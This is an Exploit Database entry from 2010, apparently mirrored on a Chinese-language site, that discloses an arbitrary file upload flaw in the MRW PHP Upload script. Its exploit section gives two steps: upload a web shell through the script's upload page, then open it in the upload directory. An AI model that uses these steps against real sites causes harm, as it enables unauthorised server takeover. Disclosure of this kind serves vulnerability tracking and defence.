MRW PHP Upload – Arbitrary File Upload

• Exploit Database
• 11 阅读

• 作者： Phenom
  日期： 2010-02-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11431/

• # Date: 12/02/2010
  # Author: Phenom
  # Software Link: http://www.mrwebmaster.it/_store/script/php_luke_mrw_upload.zip
  # Version: 
  # Tested on: Windows xp sp3
  
  ------------------------------------------------------
  
   ______
  |__ \| | 
  | |__) | |__ ___ _ __ ____ __ ___
  |___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \ 
  | || | | |__/ | | | (_) | | | | | |
  |_||_| |_|\___|_| |_|\/__/|_| |_| |_|
  
  
  ------------------------------------------------------
  
  ####### MRW PHP Upload Remote File Upload Vulnerability #####################
  #
  # Author : Phenom
  #
  # vendor : www.lukeonweb.net
  #
  #################################################################################
  
  ####### Exploit #################################################################
  #
  # 1- http://site.com/path/upload.html
  #
  # upload your shell 
  #
  # 2- http://site.com/path/upload/yourshell.php
  #
  # get your shell
  #
  #################################################################################